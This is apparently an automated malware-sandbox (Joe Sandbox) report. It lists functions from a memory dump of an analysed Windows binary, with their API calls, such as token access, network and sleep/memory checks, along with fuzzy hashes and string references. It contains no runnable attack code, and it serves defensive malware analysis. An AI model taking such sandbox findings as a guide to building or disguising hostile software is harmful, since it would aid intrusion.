Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d93793f2f49fc3f8be0e9fbb42c48cc64209359f99166b623ac0aea5b79b3710
Instruction ID: a5d2181d7681f543b03cfa994d0874ec238efe1c8709c75be2b6699ff1c6ab4f
Opcode Fuzzy Hash: d93793f2f49fc3f8be0e9fbb42c48cc64209359f99166b623ac0aea5b79b3710
Instruction Fuzzy Hash: FAF03A36041699BADB126FA4AC0DFCA3E59AF06310F548104FA15650E1C7755561CBE5

Function 001F98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001F98CC
SetTextColor.GDI32(?,?), ref: 001F98D6
SetBkMode.GDI32(?,00000001), ref: 001F98E9
GetStockObject.GDI32(00000005), ref: 001F98F1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 478a8c392499d8796d0c1490999cf420031e6438dc142f8d2d7e7825424722c4
Instruction ID: 93c15d6416793c155bdbf43f5f13427bbab7fbfc4f9a935c496d1a0cfaa07f8d
Opcode Fuzzy Hash: 478a8c392499d8796d0c1490999cf420031e6438dc142f8d2d7e7825424722c4
Instruction Fuzzy Hash: 2EE03971244284AADF215B74BC0DBE93B20AB12336F648229F6BE580E1C3B246909B10

Function 0024162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00241634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002411D9), ref: 0024163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002411D9), ref: 00241648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002411D9), ref: 0024164F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 61c7478aeabc91fe3d8e2cf987ea20f5903b62d2cb8bfd9cf0f9efe128e4b604
Instruction ID: d2f16e34d7ab1c07b6182d34b23edf25c67b7b31950e467fc641892a0ce63b10
Opcode Fuzzy Hash: 61c7478aeabc91fe3d8e2cf987ea20f5903b62d2cb8bfd9cf0f9efe128e4b604
Instruction Fuzzy Hash: 0AE08C32602222EBD7202FB0BE0DB863B7CAF44792F25884CF749D9090E63484D0CBA4

Function 0023D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0023D858
GetDC.USER32(00000000), ref: 0023D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023D882
ReleaseDC.USER32(?), ref: 0023D8A3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3635aed65a872f002324c1204818f7be829f60f571b93d73147c45a00f8eceb0
Instruction ID: ff9485101178d295ab4bd3b8d73ca71184ea786f90a234e7d61a03e1f208832f
Opcode Fuzzy Hash: 3635aed65a872f002324c1204818f7be829f60f571b93d73147c45a00f8eceb0
Instruction Fuzzy Hash: E6E01AB0800204DFCB41AFB1E84C66DBBB6FB48310F208009F91AE7250CB385982AF40

Function 0023D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0023D86C
GetDC.USER32(00000000), ref: 0023D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023D882
ReleaseDC.USER32(?), ref: 0023D8A3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 729955c8faf436b5ded6581cd6647d89098bc8d77aab0a397d28503e6be88c2f
Instruction ID: c7223e0b281a260ecef46ef8ada1ceaed7fc89578bae018e1cc5e47891044ce0
Opcode Fuzzy Hash: 729955c8faf436b5ded6581cd6647d89098bc8d77aab0a397d28503e6be88c2f
Instruction Fuzzy Hash: 87E09A75800204DFCB51AFB5E84C66DBBB5BB48311B248449F95AE7250DB3959419F50

Function 00254D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00254ED4

Strings

LPT, xrefs: 00254DFB
*, xrefs: 00254E10

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: e6a45f5f7e3e8929936254977ad9c45723937744e60278d1bc778e403c8db749
Instruction ID: 23ed67ab3cda860ad7f18fd5416abbcca50228886dfeb70606d26cf1ac9012e8
Opcode Fuzzy Hash: e6a45f5f7e3e8929936254977ad9c45723937744e60278d1bc778e403c8db749
Instruction Fuzzy Hash: 9D9172759102459FDB14DF58C484EA9FBF1BF48308F148099E80A5F7A2C771ED99CB94

Function 0020E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0020E30D

Strings

pow, xrefs: 0020E2E5, 0020E302

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: db6df330c7251997f6e161e9f345667f365e959bf2d4b7d0ce839fa9aeeb0fb9
Instruction ID: da9d208e3195d031020fc19c7fe403a0b5b5ad7aa87840a5bbd1549c2c9d5c4a
Opcode Fuzzy Hash: db6df330c7251997f6e161e9f345667f365e959bf2d4b7d0ce839fa9aeeb0fb9
Instruction Fuzzy Hash: 73517A71A3D30796CF157F14D9453FA2BF4ABA0740F304DA8E495822EADB318CF59A86

Function 00267771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0023569E,00000000,?,0027CC08,?,00000000,00000000), ref: 002678DD

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

CharUpperBuffW.USER32(0023569E,00000000,?,0027CC08,00000000,?,00000000,00000000), ref: 0026783B

Strings

<s*, xrefs: 002677C8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s*
API String ID: 3544283678-228140549
Opcode ID: 753371017060c0a759b0d672925044ecd63bb7282b3aa987696eb3b1ea6592bc
Instruction ID: 8c62f38ebd39b66ed61901bdde3f34db715afecd14f00ec43145a60d0576e18c
Opcode Fuzzy Hash: 753371017060c0a759b0d672925044ecd63bb7282b3aa987696eb3b1ea6592bc
Instruction Fuzzy Hash: 9E618032924559ABCF04EFA5EC91DFDB3B4BF24304B944129F542B7091EF306A95DBA0

Function 001FE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 001FE1B1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 758ce69736fdab334ecc77d38a1518266419171c692ffef0ed3c5e649398b552
Instruction ID: a061cfd13bebfbac95d06831e5b053dc2eea4fad011b87d1820e42858e6d90dd
Opcode Fuzzy Hash: 758ce69736fdab334ecc77d38a1518266419171c692ffef0ed3c5e649398b552
Instruction Fuzzy Hash: 115133B590024ADFDF18DF28C481ABEBBA8EF65310F254055F9919B2E0E7309D56CB90

Function 001FF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 001FF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 001FF2BB

Strings

@, xrefs: 001FF2AF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 033e56bb0b92b8644cd33605d4a5ad56dac7ce6c5e9987d87c37b451806fe363
Instruction ID: 8ae69c0b8b2fe8ea88015ae7c68dda2484deed2b6f781cd7d6c85a257261a667
Opcode Fuzzy Hash: 033e56bb0b92b8644cd33605d4a5ad56dac7ce6c5e9987d87c37b451806fe363
Instruction Fuzzy Hash: 62515771408B859BE320AF15EC86BAFBBF8FF95300F81885DF1D941195EB318529CB66

Function 00265745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002657E0
_wcslen.LIBCMT ref: 002657EC

Strings

CALLARGARRAY, xrefs: 002657E6, 002657EB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 6b03ba83c80cc368282cb4928cd4c1794d73dcf4820cc134eb67cabfc4652093
Instruction ID: 90a15e91d4d68a7d51c1bce7c24ccf55096cbdf9735dc1622c741d157b8bd087
Opcode Fuzzy Hash: 6b03ba83c80cc368282cb4928cd4c1794d73dcf4820cc134eb67cabfc4652093
Instruction Fuzzy Hash: A3419D71A2061A9FCB14DFA9C8859BEBBB5EF59320F104029E505A7292E7709DD1CB90

Function 0025D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0025D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0025D13A

Strings

|, xrefs: 0025D10B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 95b2f1b14d6049365ec30a4ce9c52f6bafcfda39343fe503c3687191685f62c7
Instruction ID: 8e0396b4b1be5a64bdbd2af9847a30a446dbce2cc356049370497b8b4a557de1
Opcode Fuzzy Hash: 95b2f1b14d6049365ec30a4ce9c52f6bafcfda39343fe503c3687191685f62c7
Instruction Fuzzy Hash: 90316F71D10209ABCF15EFA5CC85EEEBFB9FF14340F404059F819A6162DB31AA56CB64

Function 0027356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00273621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0027365C

Strings

static, xrefs: 002735BC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 143b67c140cea473060c7ca5ac1cdac4d8557be5cf8ae25507cd58b9465f7b67
Instruction ID: 939c7a3bb165db3c644567242bff1fd777419d3fbfe4e8497aaf1c699bb0e65e
Opcode Fuzzy Hash: 143b67c140cea473060c7ca5ac1cdac4d8557be5cf8ae25507cd58b9465f7b67
Instruction Fuzzy Hash: 9031A171110605AADB10DF38DC40EBB73ADFF98720F50C619F86997180DB30AD91D764

Function 00274537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0027461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00274634

Strings

', xrefs: 0027458E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 9ad8b5820369f52c36947fb1240e2bc48176fa83e4c9051554dbe950d43c0192
Instruction ID: a62dcb10aea65ad0260eed254c7d330420634f29db2c1d4043b48e193f8f8694
Opcode Fuzzy Hash: 9ad8b5820369f52c36947fb1240e2bc48176fa83e4c9051554dbe950d43c0192
Instruction Fuzzy Hash: 5D314874A0020A9FDB14DFA9C990BDA7BB9FF19300F50816AE908AB351D770E951CF90

Function 002731EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0027327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00273287

Strings

Combobox, xrefs: 00273249

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7df6ccf0762e59b1f71a0ce357fbc962dea94190000e972e79c7a3456acfe1af
Instruction ID: 60093bc38e6696f153e62ad871647a548825352c3cfc5893eec911bccad7fffb
Opcode Fuzzy Hash: 7df6ccf0762e59b1f71a0ce357fbc962dea94190000e972e79c7a3456acfe1af
Instruction Fuzzy Hash: 401104713202097FFF25DF54DC84EBB376AEB983A4F208128F91CA7291D6319D619B60

Function 00273710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
Part of subcall function 001E600E: GetStockObject.GDI32(00000011), ref: 001E6060
Part of subcall function 001E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A

GetWindowRect.USER32(00000000,?), ref: 0027377A
GetSysColor.USER32(00000012), ref: 00273794

Strings

static, xrefs: 00273757

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a05467fcf779489a6c9783ef635b38155809338a6212a7eec3eb43208d2a2f76
Instruction ID: e273a6dfd1aa585e52caa635fc0a43ad4d13879c58d3a6a7d506a141d084de9b
Opcode Fuzzy Hash: a05467fcf779489a6c9783ef635b38155809338a6212a7eec3eb43208d2a2f76
Instruction Fuzzy Hash: 30113AB262020AAFDF00DFB8DC49EEE7BB8FB09354F104918F959E2250D775E8619B50

Function 0025CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0025CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0025CDA6

Strings

<local>, xrefs: 0025CD66

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f8e38a7a7e88d5b8871bccf896b7e02583300d26479268be01fcc7a85cc83bd2
Instruction ID: 2e12d1bff07a5123e3e74450290b28851ac8af3edc3ca1cd0847e3589f2fb6da
Opcode Fuzzy Hash: f8e38a7a7e88d5b8871bccf896b7e02583300d26479268be01fcc7a85cc83bd2
Instruction Fuzzy Hash: 1F11A7711267367ED7284A668C49FE7BEBCEB127A5F204239B509C2080E7705854D6F4

Function 00273429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002734AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002734BA

Strings

edit, xrefs: 0027348F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b4eddd52bde2b46ea8a64b0299d8ed8540ec0e2881977a0d9c5a7eaba0e1ba77
Instruction ID: a3831f2eee671a7ec07b03ffbf318295fd6248750dee8c24e6ca847d7df30168
Opcode Fuzzy Hash: b4eddd52bde2b46ea8a64b0299d8ed8540ec0e2881977a0d9c5a7eaba0e1ba77
Instruction Fuzzy Hash: 5A11C171120109AFEB158E74EC54AFB376AEF15374F608324FA68931D0C771DCA1AB50

Function 00246C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00246CB6
_wcslen.LIBCMT ref: 00246CC2

Strings

STOP, xrefs: 00246CBC, 00246CC1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 70de8e7697279e6cd24b863d357e8e8c4e22c1f826cf4eba7f872d9ebcde15d1
Instruction ID: 1dcc8409a6ab7d514915c037839eaab4963fd837361df1eb33ad11448b33d924
Opcode Fuzzy Hash: 70de8e7697279e6cd24b863d357e8e8c4e22c1f826cf4eba7f872d9ebcde15d1
Instruction Fuzzy Hash: 68010432A205278BCB28AFFDDC888BF73A4EF627147500529E85297190EB31DC60CA51

Function 00241CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

